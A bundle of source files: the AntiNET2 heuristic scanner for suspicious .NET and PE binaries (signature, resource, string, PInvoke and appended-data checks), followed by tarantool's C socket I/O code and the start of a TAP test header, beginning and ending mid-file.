_asm.AddDetection("PInvoke", new Reason("PInvoke", string.Format("Uncommon PInvoke dll referenced: {0}", md.ImplMap.Module.Name.ToString())));
d++;
return d;
}
foreach (PInvokeEntry pEntry in DetectionDatabase.Natives)
{
if (md.ImplMap.Name.StartsWith(pEntry.Trigger, StringComparison.InvariantCultureIgnoreCase))
{
_asm.AddDetection(pEntry.Category, new Reason(pEntry.Category, pEntry.Description));
d++;
}
}
return d;
}
}
}
<|start_filename|>AntiNET2/Scanner.cs<|end_filename|>
using AntiNET2.Core.Models;
using AntiNET2.Core.Providers.Database;
using AntiNET2.Core.Providers.DetectionEngines.Managed;
using AntiNET2.Core.Providers.DetectionEngines.Native;
using dnlib.DotNet;
using dnlib.PE;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AntiNET2
{
public static class Scanner
{
public static List<Detection> Scan(string file, out int detectionCount)
{
AssemblySettings asmSettings = new AssemblySettings();
bool isNet = true;
try
{
asmSettings.Module = ModuleDefMD.Load(file);
}
catch (Exception)
{
isNet = false;
}
if (!isNet)
{
try
{
asmSettings.NativeImage = new PEImage(file);
}
catch (Exception ex)
{
// Cannot continue execution
Console.WriteLine(ex);
Console.ReadLine();
detectionCount = 0;
return new List<Detection>();
}
}
else
{
asmSettings.NativeImage = asmSettings.Module.MetaData.PEImage as PEImage;
}
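// Managed (IL-level) engines only apply to .NET assemblies; the native
// PE engines below run for every input file.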
List<IDetectionProcess> dp = new List<IDetectionProcess>();
if (isNet)
{
dp.Add(new ResourceDetection());
dp.Add(new StringDetection());
dp.Add(new ReflectionDetection());
dp.Add(new PInvokeDetection());
}
dp.Add(new EOFDetection());
dp.Add(new SectionDetection());
dp.Add(new SignatureDetection());
int totalDetections = dp.Sum(x => x.Detect(asmSettings));
DetectionDatabase.Save();
detectionCount = totalDetections;
return asmSettings.TotalDetections;
}
}
}
<|start_filename|>AntiNET2/Core/Helpers/ByteScan.cs<|end_filename|>
using System;
using System.Linq;
using Newtonsoft.Json;
using Newtonsoft.Json.Serialization;
namespace AntiNET2.Core.Helpers
{
/// <summary>
/// BahNahNah
/// </summary>
public static unsafe class ByteScan
{
/// <summary>
/// Example sig:
/// 01 02 ?3 04
/// will match with
/// 01 02 A3 04
/// 01 02 03 04
/// but not with
/// 01 02 3A 04
/// A0 02 3A 04
/// etc.
/// </summary>
/// <param name="scan">Bytes to scan</param>
/// <param name="sig">Byte sig</param>
/// <returns>Index of scan array where pattern match. -1 on failure.</returns>
public static int GetIndexOfSig(byte[] scan, string sig) => CompileSig(sig).Scan(scan);
public static Sig CompileSig(string sig)
{
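// Each signature byte is compiled into a ushort: the low byte is a nibble
// mask (0xF0 when the high nibble must match, 0x0F when the low nibble must,
// 0x00 for "??") and the high byte is the expected value with wildcard
// nibbles zeroed. Sig.Scan then checks ((current & mask) ^ expected) == 0.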
var cArray = sig.Split(' ').Select(c => {
ushort flag = 0;
if (c == "??")
{
return flag;
}
if (c[0] != '?')
{ //LEFT
flag |= 0xF0;
}
if (c[1] != '?')
{ //RIGHT
flag |= 0x0F;
}
c = c.Replace('?', '0');
flag |= (ushort)((Convert.ToByte(c, 16) & flag) << 8);
return flag;
}).ToArray();
return new Sig(cArray);
}
public class Sig
{
[JsonProperty("SigFlags")]
private ushort[] SigFlags;
public Sig(ushort[] _sc)
{
SigFlags = _sc;
}
public int Scan(byte[] scan)
{
if (scan.Length < SigFlags.Length)
return -1;
fixed (byte* scrArrayPtr = &scan[0])
{
var scrEnum = scrArrayPtr;
var end = (scrArrayPtr + (scan.Length - SigFlags.Length + 1));
while (scrEnum != end)
{
bool found = true;
for (int pIndex = 0; pIndex < SigFlags.Length; pIndex++)
{
ushort flag = SigFlags[pIndex];
var current = *(scrEnum + pIndex);
if (((current & flag) ^ (flag >> 8)) != 0)
{
found = false;
break;
}
}
if (found)
return (int)(scrEnum - scrArrayPtr);
scrEnum++;
}
}
return -1;
}
}
}
}
<|start_filename|>AntiNET2/Core/Models/IDetectionEntry.cs<|end_filename|>
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AntiNET2.Core.Models
{
public interface IDetectionEntry
{
string Category { get; set; }
string Description { get; set; }
string Trigger { get; set; }
object Tag { get; set; }
}
}
<|start_filename|>AntiNET2/Core/Providers/DetectionEngines/Native/SignatureDetection.cs<|end_filename|>
using AntiNET2.Core.Models;
using AntiNET2.Core.Models.Database;
using AntiNET2.Core.Providers.Database;
using AntiNET2.Core.Extensions;
using dnlib.DotNet;
using dnlib.DotNet.Emit;
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Diagnostics;
using static AntiNET2.Core.Helpers.ByteScan;
namespace AntiNET2.Core.Providers.DetectionEngines.Native
{
public class SignatureDetection : IDetectionProcess
{
private AssemblySettings _asm;
public int Detect(AssemblySettings asm)
{
_asm = asm;
int d = 0;
//asm.NativeImage.UnsafeDisableMemoryMappedIO();
try
{
byte[] file = File.ReadAllBytes(asm.NativeImage.FileName);
foreach (SignatureEntry sig in DetectionDatabase.Signatures)
{
long sigIndex = ((Sig)sig.Tag).Scan(file);
if (sigIndex == -1)
{
continue;
}
// Should I insert the sig Category here instead of "Signature"?
asm.AddDetection("Signature", new Reason("Signature", string.Format("Matched {0} ({2}) at offset 0x{1}", sig.Trigger, sigIndex.ToString("X2"), sig.Description)));
d++;
}
}
catch (Exception)
{
// File access issue?
asm.AddDetection("Signature", new Reason("Signature", "Error when processing signatures"));
d++;
}
return d;
}
}
}
<|start_filename|>AntiNET2/Core/Models/Database/SignatureEntry.cs<|end_filename|>
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AntiNET2.Core.Models.Database
{
public class SignatureEntry : IDetectionEntry
{
public string Category { get; set; }
public string Description { get; set; }
public string Trigger { get; set; }
public object Tag { get; set; }
}
}
<|start_filename|>AntiNET2/Core/Providers/Database/DetectionDatabase.cs<|end_filename|>
using AntiNET2.Core.Helpers;
using AntiNET2.Core.Models;
using AntiNET2.Core.Models.Database;
using AntiNET2.Core.Providers.Database;
using Newtonsoft.Json;
using Newtonsoft.Json.Linq;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AntiNET2.Core.Providers.Database
{
/// <summary>
/// Credits to BahNahNah for curing the eye melting mess!
/// </summary>
public static class DetectionDatabase
{
public static List<ReflectionEntry> Calls => Database.Calls;
public static List<StringEntry> Strings => Database.Strings;
public static List<PInvokeEntry> Natives => Database.Natives;
public static List<SignatureEntry> Signatures => Database.Signatures;
private static DatabaseInfo Database;
static DetectionDatabase()
{
if (!File.Exists("db.json"))
{
Database = new DatabaseInfo();
CreateData();
Save();
}
else
{
Database = JsonConvert.DeserializeObject<DatabaseInfo>(File.ReadAllText("db.json"));
}
// This has to happen no matter whether it is just created, or just loaded
// Multiple methods like this will more than likely be made for other things that require 'Tag' to be used.
LoadSignatures();
}
public static void Save() => File.WriteAllText("db.json", JsonConvert.SerializeObject(Database));
private static void CreateData()
{
Database.Calls = new List<ReflectionEntry>();
Database.Signatures = new List<SignatureEntry>();
Database.Natives = new List<PInvokeEntry>();
Database.Strings = new List<StringEntry>();
/*for (int i = 0; i < 5000; i++)
{
Signatures.Add(new SignatureEntry() { Trigger = "0E 1F BA 0E ?? B4 09 CD ?? B8 01 ?? CD 21", Category = "Test", Description = "Test1" });
Signatures.Add(new SignatureEntry() { Trigger = "?? 29 D6 F4 3F 14 DE AB F1 84 9B 6A E3 1B ?? 02 ?? 7A AF B6 13 4E E3 83 B9", Category = "Test", Description = "Test2" });
Signatures.Add(new SignatureEntry() { Trigger = "4D 5A 90 0? 03", Category = "Test", Description = "Test3" });
}*/
}
public static void AddDetection(IDetectionEntry entry)
{
if (entry is ReflectionEntry)
{
Database.Calls.Add(entry as ReflectionEntry);
}
else if (entry is SignatureEntry)
{
Database.Signatures.Add(entry as SignatureEntry);
}
else if (entry is PInvokeEntry)
{
Database.Natives.Add(entry as PInvokeEntry);
}
else if (entry is StringEntry)
{
Database.Strings.Add(entry as StringEntry);
}
}
private static void LoadSignatures()
{
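// Compile each signature's textual trigger into a Sig matcher on first load;
// when the Tag has been round-tripped through JSON it comes back as a JToken
// and is deserialized into a Sig instead.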
for (int i = 0; i < Signatures.Count; i++)
{
if (Signatures[i].Tag == null)
{
Signatures[i].Tag = ByteScan.CompileSig(Signatures[i].Trigger);
}
else if (Signatures[i].Tag.GetType().Name != "Sig")
{
string contents = ((JToken)Signatures[i].Tag).ToString();
ByteScan.Sig sg = JsonConvert.DeserializeObject<ByteScan.Sig>(contents);
Signatures[i].Tag = sg;
}
}
}
}
}
<|start_filename|>AntiNET2/Core/Providers/DetectionEngines/Native/EOFDetection.cs<|end_filename|>
using AntiNET2.Core.Models;
using dnlib.DotNet;
using dnlib.PE;
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using AntiNET2.Core.Extensions;
namespace AntiNET2.Core.Providers.DetectionEngines.Native
{
public class EOFDetection : IDetectionProcess
{
private PEImage mod;
public int Detect(AssemblySettings asm)
{
int d = 0;
mod = asm.NativeImage;
var lastSec = mod.ImageSectionHeaders.Last();
var eofOffset = lastSec.PointerToRawData + lastSec.SizeOfRawData;
using (var pe = mod.CreateFullStream())
{
// If the file ends exactly at the last section, there is no appended (EOF) data to inspect
if (pe.Length <= eofOffset)
{
return d;
}
if (pe.Length > eofOffset + 8)
{
pe.Position = eofOffset;
byte[] eof = pe.ReadBytes(8);
d += eof.SigDetection(asm, "End of File");
}
asm.AddDetection("End of File", new Reason("End of File", "End of File data detected, could be storage for malicious content or settings"));
d++;
}
return d;
}
}
}
<|start_filename|>AntiNET2/Core/Providers/DetectionEngines/Managed/ResourceDetection.cs<|end_filename|>
using AntiNET2.Core.Models;
using dnlib.DotNet;
using System;
using System.Collections;
using System.Collections.Generic;
using System.Drawing;
using System.Linq;
using System.Resources;
using System.Text;
using System.Threading.Tasks;
using AntiNET2.Core.Extensions;
using AntiNET2.Core.Helpers;
namespace AntiNET2.Core.Providers.DetectionEngines.Managed
{
public class ResourceDetection : IDetectionProcess
{
private Random r = new Random();
private AssemblySettings _asm;
private Dictionary<int, Resource> sizeHandler = new Dictionary<int, Resource>();
private List<string> manifestNames = new List<string>();
private List<string> readerNames = new List<string>();
public int Detect(AssemblySettings asm)
{
_asm = asm;
ModuleDefMD mod = asm.Module;
int d = 0;
foreach (Resource res in mod.Resources)
{
manifestNames.Add(res.Name);
}
foreach (Resource res in mod.Resources)
{
if (res.ResourceType != ResourceType.Embedded)
continue;
EmbeddedResource ebr = res as EmbeddedResource;
TypeDef assoc = GetAssociatedType(mod, ebr.Name);
if (assoc == null)
{
asm.AddDetection("Resources", new Reason("Resources", "Associated type with the resource was not found"));
d++;
}
ResourceReader reader = null;
try
{
reader = new ResourceReader(ebr.GetResourceStream());
}
catch (Exception)
{
// Probably null or such
}
if (reader == null)
{
asm.AddDetection("Resources", new Reason("Resources", "Resource is a manifest resource, could contain malicious details."));
d++;
if (ebr.GetResourceData().Length > 32)
{
d += ByteTests(ebr.GetResourceData(), ebr);
}
d += NameTests(ebr.Name, ebr, manifestNames);
}
else
{
foreach (DictionaryEntry a in reader)
{
readerNames.Add((string)a.Key);
}
foreach (DictionaryEntry a in reader)
{
if (a.Value is byte[])
{
byte[] b = a.Value as byte[];
d += ByteTests(b, ebr);
}
if (a.Value is Bitmap)
{
// Icon check, icons generally have the same width & height
Bitmap bit = a.Value as Bitmap;
if (bit.Size.Height != bit.Size.Width)
{
asm.AddDetection("Resources", new Reason("Resources", "Bitmap Resource was not equal dimensions, could be steganography."));
d++;
}
}
d += NameTests(a.Key as string, ebr, readerNames);
}
}
readerNames.Clear();
}
return d;
}
private int ByteTests(byte[] array, EmbeddedResource ebr)
{
int d = 0;
if (array.Length > 300000)
{
_asm.AddDetection("Resources", new Reason("Resources", "Large resource was found, larger than 300KB"));
d++;
}
if (sizeHandler.ContainsKey(array.Length))
{
_asm.AddDetection("Resources", new Reason("Resources", "Another resource has the same data/length."));
d++;
}
else
{
sizeHandler.Add(array.Length, ebr);
}
if (array.Length > 8)
{
d += array.SigDetection(_asm, "Resources");
}
return d;
}
private int NameTests(string resEntryName, EmbeddedResource ebr, List<string> testAgainst)
{
int d = 0;
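// Compare the entry name against a randomly chosen sibling name; a small
// Levenshtein distance suggests sequentially named (split) resources.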
string cToReader = testAgainst[r.Next(testAgainst.Count - 1)];
if (cToReader != resEntryName)
{
int readerComp = LevenshteinDistance.Compute(ebr.Name, cToReader);
if (readerComp < 5)
{
_asm.AddDetection("Resources", new Reason("Resources", "Resource naming was consistent across others. Could mean split resources."));
d++;
}
}
return d;
}
private TypeDef GetAssociatedType(ModuleDefMD mod, string name)
{
foreach (TypeDef td in mod.Types)
{
if (td.FullName.Contains(name.Replace(".resources", "")))
{
return td;
}
}
return null;
}
}
}
<|start_filename|>AntiNET2/Core/Providers/Database/DatabaseInfo.cs<|end_filename|>
using AntiNET2.Core.Models.Database;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AntiNET2.Core.Providers.Database
{
internal class DatabaseInfo
{
public List<ReflectionEntry> Calls { get; set; }
public List<StringEntry> Strings { get; set; }
public List<PInvokeEntry> Natives { get; set; }
public List<SignatureEntry> Signatures { get; set; }
}
}
<|start_filename|>AntiNET2/Core/Providers/DetectionEngines/Managed/StringDetection.cs<|end_filename|>
using AntiNET2.Core.Models;
using AntiNET2.Core.Models.Database;
using AntiNET2.Core.Providers.Database;
using dnlib.DotNet;
using dnlib.DotNet.Emit;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AntiNET2.Core.Providers.DetectionEngines.Managed
{
public class StringDetection : IDetectionProcess
{
private AssemblySettings _asm;
public int Detect(AssemblySettings asm)
{
_asm = asm;
int d = 0;
foreach (TypeDef td in asm.Module.GetTypes())
{
foreach (MethodDef md in td.Methods)
{
if (!md.HasBody)
continue;
d += ProcessMethod(md);
}
}
return d;
}
private int ProcessMethod(MethodDef md)
{
int d = 0;
foreach (Instruction inst in md.Body.Instructions)
{
if (inst.OpCode == OpCodes.Ldstr)
{
string data = inst.Operand as string;
foreach (StringEntry pEntry in DetectionDatabase.Strings)
{
if (data.ToLower().Contains(pEntry.Trigger.ToLower()))
{
_asm.AddDetection("ManagedStrings", new Reason("ManagedStrings", pEntry.Description));
d++;
}
}
}
}
return d;
}
}
}
<|start_filename|>AntiNET2/Core/Models/IDetectionProcess.cs<|end_filename|>
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AntiNET2.Core.Models
{
interface IDetectionProcess
{
int Detect(AssemblySettings asm);
}
}
<|start_filename|>tnt/tnt_io.c<|end_filename|>
/*
* Redistribution and use in source and binary forms, with or
* without modification, are permitted provided that the following
* conditions are met:
*
* 1. Redistributions of source code must retain the above
* copyright notice, this list of conditions and the
* following disclaimer.
*
* 2. Redistributions in binary form must reproduce the above
* copyright notice, this list of conditions and the following
* disclaimer in the documentation and/or other materials
* provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY <COPYRIGHT HOLDER> ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
* TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
* A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL
* <COPYRIGHT HOLDER> OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
* INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
* BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
* LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF
* THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
/* need this to get IOV_MAX on some platforms. */
#ifndef __need_IOV_MAX
#define __need_IOV_MAX
#endif
#include <limits.h>
#include <stdlib.h>
#include <stdio.h>
#include <stdarg.h>
#include <string.h>
#include <stdbool.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <netinet/in.h>
#include <sys/poll.h>
#include <sys/un.h>
#include <netinet/tcp.h>
#include <netdb.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <tarantool/tnt_net.h>
#include <tarantool/tnt_io.h>
#include <uri.h>
#if !defined(MIN)
# define MIN(a, b) (a) < (b) ? (a) : (b)
#endif /* !defined(MIN) */
#define TIMEVAL_TO_MSEC(tv) ((tv).tv_sec * 1000 + (tv).tv_usec / 1000)
#define TIMEVAL_DIFF_MSEC(tv1, tv2) (((tv1).tv_sec - (tv2).tv_sec) * 1000 + \
((tv1).tv_usec - (tv2).tv_usec) / 1000)
static enum tnt_error
tnt_io_setopts(struct tnt_stream_net *s);
static enum tnt_error
tnt_io_resolve(struct addrinfo **addr_info_p,
const char *hostname, const char *port)
{
struct addrinfo *addr_info = NULL;
struct addrinfo hints;
memset(&hints, 0, sizeof(hints));
hints.ai_socktype = SOCK_STREAM;
hints.ai_protocol = IPPROTO_TCP;
if (getaddrinfo(hostname, port, &hints, &addr_info) == 0 &&
addr_info != NULL) {
*addr_info_p = addr_info;
return TNT_EOK;
}
return TNT_ERESOLVE;
}
static enum tnt_error
tnt_io_nonblock(struct tnt_stream_net *s, int set)
{
int flags = fcntl(s->fd, F_GETFL);
if (flags == -1) {
s->errno_ = errno;
return TNT_ESYSTEM;
}
if (set)
flags |= O_NONBLOCK;
else
flags &= ~O_NONBLOCK;
if (fcntl(s->fd, F_SETFL, flags) == -1) {
s->errno_ = errno;
return TNT_ESYSTEM;
}
return TNT_EOK;
}
/** Waiting for connection while handling signal events. */
static enum tnt_error
tnt_io_connect_do(struct tnt_stream_net *s, struct sockaddr *addr,
socklen_t addr_size)
{
/* setting nonblock */
enum tnt_error result = tnt_io_nonblock(s, 1);
if (result != TNT_EOK)
return result;
if (connect(s->fd, (struct sockaddr*)addr, addr_size) != -1)
return TNT_EOK;
if (errno == EINPROGRESS) {
/* get start connect time */
struct timeval start_connect;
if (gettimeofday(&start_connect, NULL) == -1) {
s->errno_ = errno;
return TNT_ESYSTEM;
}
/* set initial timer */
int timeout = TIMEVAL_TO_MSEC(s->opt.tmout_connect);
while (1) {
struct pollfd fds[1];
fds[0].fd = s->fd;
fds[0].events = POLLOUT;
int ret = poll(fds, 1, timeout);
if (ret == -1) {
if (errno == EINTR || errno == EAGAIN) {
/* get current time */
struct timeval curr;
if (gettimeofday(&curr, NULL) == -1) {
s->errno_ = errno;
return TNT_ESYSTEM;
}
/* check timeout */
int passed_time = TIMEVAL_DIFF_MSEC(
curr, start_connect);
if (passed_time >= timeout) {
/* timeout */
return TNT_ETMOUT;
}
} else {
s->errno_ = errno;
return TNT_ESYSTEM;
}
} else if (ret == 0) {
/* timeout */
return TNT_ETMOUT;
} else {
/* we have a event on socket */
break;
}
}
/* checking error status */
int opt = 0;
socklen_t len = sizeof(opt);
if ((getsockopt(s->fd, SOL_SOCKET, SO_ERROR,
&opt, &len) == -1) || opt) {
s->errno_ = (opt) ? opt : errno;
return TNT_ESYSTEM;
}
} else {
s->errno_ = errno;
return TNT_ESYSTEM;
}
/* setting block */
result = tnt_io_nonblock(s, 0);
if (result != TNT_EOK)
return result;
return TNT_EOK;
}
static enum tnt_error
tnt_io_connect_tcp(struct tnt_stream_net *s, const char *host, const char *port)
{
/* resolving address */
struct addrinfo *addr_info = NULL;
enum tnt_error result = tnt_io_resolve(&addr_info, host, port);
if (result != TNT_EOK)
goto out;
struct addrinfo *addr;
for (addr = addr_info; addr != NULL; addr = addr->ai_next) {
s->fd = socket(addr->ai_family, addr->ai_socktype,
addr->ai_protocol);
if (s->fd < 0) {
s->errno_ = errno;
result = TNT_ESYSTEM;
continue;
}
result = tnt_io_setopts(s);
if (result != TNT_EOK) {
tnt_io_close(s);
continue;
}
result = tnt_io_connect_do(s, addr->ai_addr, addr->ai_addrlen);
if (result != TNT_EOK) {
tnt_io_close(s);
continue;
}
break;
}
out:
if (addr_info != NULL)
freeaddrinfo(addr_info);
return result;
}
static enum tnt_error
tnt_io_connect_unix(struct tnt_stream_net *s, const char *path)
{
s->fd = socket(PF_UNIX, SOCK_STREAM, 0);
if (s->fd < 0) {
s->errno_ = errno;
return TNT_ESYSTEM;
}
enum tnt_error result = tnt_io_setopts(s);
if (result != TNT_EOK) {
tnt_io_close(s);
return result;
}
struct sockaddr_un addr;
memset(&addr, 0, sizeof(struct sockaddr_un));
addr.sun_family = AF_UNIX;
strcpy(addr.sun_path, path);
if (connect(s->fd, (struct sockaddr*)&addr, sizeof(addr)) != -1)
return TNT_EOK;
s->errno_ = errno;
tnt_io_close(s);
return TNT_ESYSTEM;
}
static enum tnt_error tnt_io_xbufmax(struct tnt_stream_net *s, int opt, int min) {
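/* Binary-search the largest buffer size the kernel accepts for the given
* socket option (SO_SNDBUF/SO_RCVBUF), starting at min (16 KB by default)
* and capped at 128 MB. */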
int max = 128 * 1024 * 1024;
if (min == 0)
min = 16384;
unsigned int avg = 0;
while (min <= max) {
avg = ((unsigned int)(min + max)) / 2;
if (setsockopt(s->fd, SOL_SOCKET, opt, &avg, sizeof(avg)) == 0)
min = avg + 1;
else
max = avg - 1;
}
return TNT_EOK;
}
static enum tnt_error tnt_io_setopts(struct tnt_stream_net *s) {
int opt = 1;
if (s->opt.uri->host_hint != URI_UNIX) {
if (setsockopt(s->fd, IPPROTO_TCP, TCP_NODELAY, &opt, sizeof(opt)) == -1)
goto error;
}
tnt_io_xbufmax(s, SO_SNDBUF, s->opt.send_buf);
tnt_io_xbufmax(s, SO_RCVBUF, s->opt.recv_buf);
if (setsockopt(s->fd, SOL_SOCKET, SO_SNDTIMEO,
&s->opt.tmout_send, sizeof(s->opt.tmout_send)) == -1)
goto error;
if (setsockopt(s->fd, SOL_SOCKET, SO_RCVTIMEO,
&s->opt.tmout_recv, sizeof(s->opt.tmout_recv)) == -1)
goto error;
return TNT_EOK;
error:
s->errno_ = errno;
return TNT_ESYSTEM;
}
enum tnt_error
tnt_io_connect(struct tnt_stream_net *s)
{
enum tnt_error result;
struct uri *uri = s->opt.uri;
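/* Dispatch on the URI type: TCP for host names and IP addresses
* (defaulting to port 3301), a UNIX domain socket otherwise. */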
switch (uri->host_hint) {
case URI_NAME:
case URI_IPV4:
case URI_IPV6: {
char host[128];
const char *port = uri->service == NULL ? "3301" :
uri->service;
memcpy(host, uri->host, uri->host_len);
host[uri->host_len] = '\0';
result = tnt_io_connect_tcp(s, host, port);
break;
}
case URI_UNIX: {
char service[128];
memcpy(service, uri->service, uri->service_len);
service[uri->service_len] = '\0';
result = tnt_io_connect_unix(s, service);
break;
}
default:
result = TNT_EFAIL;
}
if (result != TNT_EOK)
return result;
s->connected = 1;
return TNT_EOK;
}
void tnt_io_close(struct tnt_stream_net *s)
{
if (s->fd > 0) {
close(s->fd);
s->fd = -1;
}
s->connected = 0;
}
ssize_t tnt_io_flush(struct tnt_stream_net *s) {
if (s->sbuf.off == 0)
return 0;
ssize_t rc = tnt_io_send_raw(s, s->sbuf.buf, s->sbuf.off, 1);
if (rc == -1)
return -1;
s->sbuf.off = 0;
return rc;
}
ssize_t
tnt_io_send_raw(struct tnt_stream_net *s, const char *buf, size_t size, int all)
{
size_t off = 0;
do {
ssize_t r;
if (s->sbuf.tx) {
r = s->sbuf.tx(&s->sbuf, buf + off, size - off);
} else {
do {
r = send(s->fd, buf + off, size - off, 0);
} while (r == -1 && (errno == EINTR));
}
if (r <= 0) {
s->error = TNT_ESYSTEM;
s->errno_ = errno;
return -1;
}
off += r;
} while (off != size && all);
return off;
}
ssize_t
tnt_io_sendv_raw(struct tnt_stream_net *s, struct iovec *iov, int count, int all)
{
size_t total = 0;
while (count > 0) {
ssize_t r;
if (s->sbuf.txv) {
r = s->sbuf.txv(&s->sbuf, iov, MIN(count, getiovmax()));
} else {
do {
r = writev(s->fd, iov, count);
} while (r == -1 && (errno == EINTR));
}
if (r <= 0) {
s->error = TNT_ESYSTEM;
s->errno_ = errno;
return -1;
}
total += r;
if (!all)
break;
while (count > 0) {
if (iov->iov_len > (size_t)r) {
iov->iov_base += r;
iov->iov_len -= r;
break;
} else {
r -= iov->iov_len;
iov++;
count--;
}
}
}
return total;
}
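/*
 * tnt_io_send() coalesces small writes into the stream's send buffer when
 * one is configured. A payload larger than the whole buffer is rejected
 * with TNT_EBIG; a payload that no longer fits into the remaining space
 * first triggers a flush of the buffered data, after which the new payload
 * is copied into the now-empty buffer.
 */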
ssize_t
tnt_io_send(struct tnt_stream_net *s, const char *buf, size_t size)
{
if (s->sbuf.buf == NULL)
return tnt_io_send_raw(s, buf, size, 1);
if (size > s->sbuf.size) {
s->error = TNT_EBIG;
return -1;
}
if ((s->sbuf.off + size) <= s->sbuf.size) {
memcpy(s->sbuf.buf + s->sbuf.off, buf, size);
s->sbuf.off += size;
return size;
}
ssize_t r = tnt_io_send_raw(s, s->sbuf.buf, s->sbuf.off, 1);
if (r == -1)
return -1;
s->sbuf.off = size;
memcpy(s->sbuf.buf, buf, size);
return size;
}
inline static void
tnt_io_sendv_put(struct tnt_stream_net *s, struct iovec *iov, int count) {
int i;
for (i = 0 ; i < count ; i++) {
memcpy(s->sbuf.buf + s->sbuf.off,
iov[i].iov_base,
iov[i].iov_len);
s->sbuf.off += iov[i].iov_len;
}
}
ssize_t
tnt_io_sendv(struct tnt_stream_net *s, struct iovec *iov, int count)
{
if (s->sbuf.buf == NULL)
return tnt_io_sendv_raw(s, iov, count, 1);
size_t size = 0;
int i;
for (i = 0 ; i < count ; i++)
size += iov[i].iov_len;
if (size > s->sbuf.size) {
s->error = TNT_EBIG;
return -1;
}
if ((s->sbuf.off + size) <= s->sbuf.size) {
tnt_io_sendv_put(s, iov, count);
return size;
}
ssize_t r = tnt_io_send_raw(s, s->sbuf.buf, s->sbuf.off, 1);
if (r == -1)
return -1;
s->sbuf.off = 0;
tnt_io_sendv_put(s, iov, count);
return size;
}
ssize_t
tnt_io_recv_raw(struct tnt_stream_net *s, char *buf, size_t size, int all)
{
size_t off = 0;
do {
ssize_t r;
if (s->rbuf.tx) {
r = s->rbuf.tx(&s->rbuf, buf + off, size - off);
} else {
do {
r = recv(s->fd, buf + off, size - off, 0);
} while (r == -1 && (errno == EINTR));
}
if (r <= 0) {
s->error = TNT_ESYSTEM;
s->errno_ = errno;
return -1;
}
off += r;
} while (off != size && all);
return off;
}
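/*
 * tnt_io_recv() reads through the stream's receive buffer when one is
 * configured: it first drains whatever is already buffered, then refills
 * the buffer with a single raw recv() of at most rbuf.size bytes, and
 * repeats until `size` bytes have been copied out.
 */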
ssize_t
tnt_io_recv(struct tnt_stream_net *s, char *buf, size_t size)
{
if (s->rbuf.buf == NULL)
return tnt_io_recv_raw(s, buf, size, 1);
size_t lv, rv, off = 0, left = size;
while (1) {
if ((s->rbuf.off + left) <= s->rbuf.top) {
memcpy(buf + off, s->rbuf.buf + s->rbuf.off, left);
s->rbuf.off += left;
return size;
}
lv = s->rbuf.top - s->rbuf.off;
rv = left - lv;
if (lv) {
memcpy(buf + off, s->rbuf.buf + s->rbuf.off, lv);
off += lv;
}
s->rbuf.off = 0;
ssize_t top = tnt_io_recv_raw(s, s->rbuf.buf, s->rbuf.size, 0);
if (top <= 0) {
s->errno_ = errno;
s->error = TNT_ESYSTEM;
return -1;
}
s->rbuf.top = top;
if (rv <= s->rbuf.top) {
memcpy(buf + off, s->rbuf.buf, rv);
s->rbuf.off = rv;
return size;
}
left -= lv;
}
return -1;
}
int getiovmax()
{
#if defined(IOV_MAX)
return IOV_MAX;
#elif defined(_SC_IOV_MAX)
static int iovmax = -1;
if (iovmax == -1) {
iovmax = sysconf(_SC_IOV_MAX);
/* On some embedded devices (arm-linux-uclibc based ip camera),
* sysconf(_SC_IOV_MAX) can not get the correct value. The return
* value is -1 and the errno is EINPROGRESS. Degrade the value to 1.
*/
if (iovmax == -1) iovmax = 1;
}
return iovmax;
#elif defined(UIO_MAXIOV)
return UIO_MAXIOV;
#else
return 1024;
#endif
}
<|start_filename|>test/common/test.h<|end_filename|>
#ifndef TEST_H_INCLUDED
#define TEST_H_INCLUDED
#include <stdio.h>
/**
@brief example
@code
#include "test.h"
int main(void) {
		plan(3); // count of tests you plan to check
ok(1, "Test name 1");
is(4, 2 * 2, "2 * 2 == 4");
		isnt(5, 2 * 2, "2 * 2 != 5");
		return check_plan(); // print the summary
}
@endcode
*/
/* private function, use ok(...) instead */
int __ok(int condition, const char *fmt, ...);
/* private function, use note(...) or diag(...) instead */
void __space(FILE *stream);
#define msg(stream, ...) ({ __space(stream); fprintf(stream, "# "); \
fprintf(stream, __VA_ARGS__); fprintf(stream, "\n"); })
#define note(...) msg(stdout, __VA_ARGS__)
#define diag(...) msg(stderr, __VA_ARGS__)
/**
@brief set and print plan
@param count
Before anything else, you need a testing plan. This basically declares
how many tests your program is going to run to protect against premature
failure.
*/
void plan(int count);
/**
@brief check if plan is reached and print report
*/
int check_plan(void);
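/*
 * ok(), is() and isnt() evaluate a condition via __ok() and, on failure,
 * print a TAP-style diagnostic to stderr with the test name and the
 * __FILE__/__LINE__ of the failing check.
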